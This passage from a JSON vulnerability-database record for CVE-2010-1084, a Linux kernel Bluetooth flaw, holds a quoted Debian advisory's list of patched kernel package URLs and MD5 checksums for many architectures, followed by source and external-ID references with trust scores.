http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   368810 05ee76d995844fc8461223846ab41802\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   110358 830c76ccdf7d7c99f3ea84e1e8bc962d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum: 11691670 0ecbec767291466b244fd83506f1e112\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   110392 c64900dc9ec3812df164d47c006ecffe\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum: 11399558 2d16b67f176b8223bd4dd33b90217a2e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   340088 3b6e8d8210d6e6e68eee6ddc2cab8f09\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:  4136736 42aebe2283d941bb7724daf03882914d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum: 12451186 f22b998fbdfa29023573bf9b6988dba9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   751906 d1d0480ba764b4ca3bdae8a651acd066\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:  9606938 569b72a642446ac1ffe4ed2aa13f50aa\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   370546 a3f2c479e65c9ae3be17641001b33afc\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   302516 dd1800b19f0df391bd05658a0a7846c0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   110354 479a0788049f39e648e57a3c5007b993\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:  3598606 4429cb37eda685553dde7198e5b47fd5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   762928 fe2e02babc93f6bdcc16c8f7ad8a5a88\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   301842 1e58cca757600c08424118ace4a50da5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   110374 9198f6103932b14d766b0e4c32110806\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   301034 890ed76fde4dedddcb9db60f7ba0091d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum: 17127808 a2cffd928aa5e30ab9f1f30e41b9aed1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum: 17678124 53aa5bddb6f2af761a8bfcb1fef54d02\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum: 15784596 c892e98e5ab6fcf6aa84aa5e5021309f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum: 16388546 0ce6b1186e64e745a0680088d2c9fcad\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   303348 6991ba8c20ae638798fda57540014d30\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   399720 ee32214acdf697edca92068f2d64f8b3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   110450 191bb7f29ece9f8ea2f8cff03efae3cd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   398126 32ef574340b20e8f2c7465f2290a8c0b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   413242 a5f35b11ae06961132fd16e21d5b5337\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   409820 586c33fc476019b08a3b75816d9bf520\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   110392 3f9c02cb47bc1070b92358227e030768\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20530142 c8e9146e82955c0dda3bcabe8b7542ef\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20509696 98b0e600e9bca75f016f1c4878d9d8e7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   767274 369a4858f7dfa2560ec664a08fdbac42\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:  3865974 0510efa636bb1554f9a2c040c1ee6f19\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20409094 798b4bb9a4b8d81affc30dbc2f284cc3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20679068 6b6c2a57037f510313311d76849a9b0a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:  3807640 6b21b3346b8196f19ea59d16a2e7b8f4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 18198474 627d51edc59f86bd8dfe2e7a74a25723\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20381812 493e6acfd2d47e456d1471ef44dd18ba\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:  1596580 5f456e26e01a793881871f4d683b13b1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   417750 057786734b1771be73cea6c484a09cce\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   410364 4f381b525756e6cf131be68398e58fe7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   110394 46fba74b6675f6df2057da14ba3931f9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   409858 99ce0b8165bd71e4b90745ad5a7577d1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:  3947966 aabcdf68ca8c4d35d87ad2eecb569517\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20350468 fb0caa5f722a968820562223577a4e74\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 21022322 befe070ada9e62a69c15f38c9f0e706a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:  3842206 b5e7820e844761d65d8dbf0a4ea639e5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   411454 771b6960fbfd4658124eac3673e01e90\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   359186 d2391d9bdb5fe861abe5fbd0f9f2f989\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:  3659176 8df0d712004a67cafedb9b4926970368\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   359256 18a5fda7c38b900462ea120ae04a3c98\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum: 34440420 2eddbf5140a8dc8a4a74d4e11a77ea44\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   751862 329f5ddfc14f4f6e63aa3834f7a927fe\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:  3691882 19f4f11bbad0443a7ae7153823bcc0e7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   359722 f3d89cc673ff0f2e5b7ff2e718ff44f1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum: 34252074 96729f987e7b7e02802b240da3a3293c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum: 34376386 f97af824a762b90b102d84f5c1bf65f8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   110350 9881f68b5f5446c4c773dc60d655a589\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum: 34191126 c5412cb1277801d2a2488be36dc1ad0e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   110386 c1ddbef0eeae94731617e277b32018c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   359654 cba07c82268fc13d6007ecf4be2c8508\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   262068 31c1aadffe81551bef675f9bc91b6f1e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 29432478 38c75d466da039b9e2ac1c70898b50ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   358936 9ec1ce1473362c253cf4dc7d2fd791f6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:  3966442 111674b840698cede9cdf3ecec2d5e3b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   302384 7f9f26f809e46a4748158588402d7ace\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   359360 d07b20a27666a8cb2c43f03eeb729c57\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   285392 9d513d80efd66be3e9ba7fa929b13b5f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   303780 3a507cccd77e01f7449a8ff73a3e5f6f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   760156 80eaea319450a06fe9c2310bdff051e2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 23504896 f928208abb4eb3ade6185409df5fa417\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 20252984 09ee52755ae4cf03ca082e8dbc977206\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 20244176 3c568fce5cab57746ca1dc53c8fcc754\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   110400 6676cd4c8df659937bac47ed0c08bf37\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   110464 fcbbce5e6741f1a1ec4830dba9a8ee91\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 11542616 0ead2243e1d4c2cb50760d97f9a6a2f7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 15769388 08c7a66b4f1a5c9bc9f8cc5683d5786f\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum: 19682018 7e665290822815634b1666523270919e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   110460 445931c0ad4fa00f8875f5cbaf9d83aa\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum: 19667420 02ae9fef2fea1c4ccd667c73025039f9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   760930 064ffab1507d84791e943528662e4c86\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   297650 4433daa21c6e697d8c1bb33355e14ee1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   359828 870a33c1aea0535ab0b25f3016aa9623\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum: 23074870 998294807dde61335d413ecf50fdbf3b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:  3967560 590a467f25e74daf442dfd54caaf104e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   303240 9620ba551b29adb6052e13f8277347c0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   302768 59fe05d578020afc8e1e8fe3fce3b41c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum: 28568828 86e20054979d1ffc56c24f5db73d044a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   110406 3a073335ba3488e55549b82e005fefda\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum: 15056072 429c33859de62cdfaa86e809e8625bec\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   359706 43272f2843e3b39735812c24aad332f5\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   110358 eb7bc8e6a28a6801bc7be5d22bf95a2f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum: 23581674 48797e6c39bef5a0fd120d973b541f07\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   363808 c2c489e8798d50db73d709367e390113\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   365378 a4c38de9a287a71e84d09d5474393d41\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   110392 9dd420c73a4b0c7d55fe2372a439adfb\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum: 23420066 5bf69b74154de2ae05db3280f2070b74\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:  3782640 31d483da8ccb87dbd7f75200515c8b3f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum: 23474914 42ba4ae5a23355aba50cb1a8c018a631\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   366524 a3970adc5168a37d49f28c5ce4ca05ff\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   746782 d0ef1631862e4130479ce4e3da0a6050\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:  3814900 2b936155fef59a231764ca014043b806\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   370710 35281c3da9947c322b12a014adabbcad\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum: 23159310 22caa95faeb5687d37e677b4e34503b6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   371066 9961d473b25000f7bb7a23bde2720323\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum: 23557104 bd8ab7bd0594a795f34dac94ee24ffae\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   758022 786d9ca518b1a573caf38f5492104cc4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   238208 3155d20f0210f5fd9a2e27fc28165502\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   236574 05d74c2012431ee9bdae90e172a82de0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   237136 7950ba3ebfc31e3cf6536b34eccaf684\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  7828888 56510e3515975d5ed979a55fb0bb14b7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  1633146 654e757be4670f764a99049c7984aa98\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  3633806 0c911d5a677f4fdb22f44cf617cd8374\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  7534830 da50ed9bfd6846d2ab2ced362b19ab4e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  7889984 06c9c7d89731808d7e376986cc472843\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   110394 68dd1fe380aa0c9ba6caa84f934569fd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   110416 c1d7fd64b9efab8228f305d5474de5d1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  3598560 f63cbef687984b543d1152e013bc95fe\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum: 14291528 b0e802720e53cb53650b8a2d75d1588d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   304718 aa3ebf9c5e7cde5fc11513c27b4396d0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   110370 d746af2e449aaf644370d7b88a03cf2d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum: 14631258 b056f4f2245e4e2da6ef8e7549224226\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum: 14611896 ad3108a56bbacf863b4f18521275887c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   800838 114ac1590a19b405fcacfb06ee36e55a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:  3820700 fff1d7baf26f32217a8100ca14875708\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   110352 02deff17df2e96a0ed208d786bdf9315\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:  3785870 518b0d1f9d0d13adce8d6707726031ab\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   302894 c9354f7c9769be34b6356e0d042a294e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   304918 228d8163856c2e8e261b0fd086475d68\n\n  These files will probably be moved into the stable distribution on\n  its next update",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-1084"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001934"
      },
      {
        "db": "BID",
        "id": "38898"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-1084"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "90264"
      },
      {
        "db": "PACKETSTORM",
        "id": "98412"
      },
      {
        "db": "PACKETSTORM",
        "id": "89938"
      },
      {
        "db": "PACKETSTORM",
        "id": "90307"
      },
      {
        "db": "PACKETSTORM",
        "id": "89939"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2010-1084",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "38898",
        "trust": 2.2
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2010/03/23/1",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "39830",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "43315",
        "trust": 1.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001934",
        "trust": 0.8
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20100323 CVE REQUEST: KERNEL: BLUETOOTH: POTENTIAL BAD MEMORY ACCESS WITH SYSFS FILES",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-087",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-1084",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "98419",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "90264",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "98412",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "89938",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "90307",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "89939",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2010-1084"
      },
      {
        "db": "BID",
        "id": "38898"
      },
      {
        "db": "JVNDB",
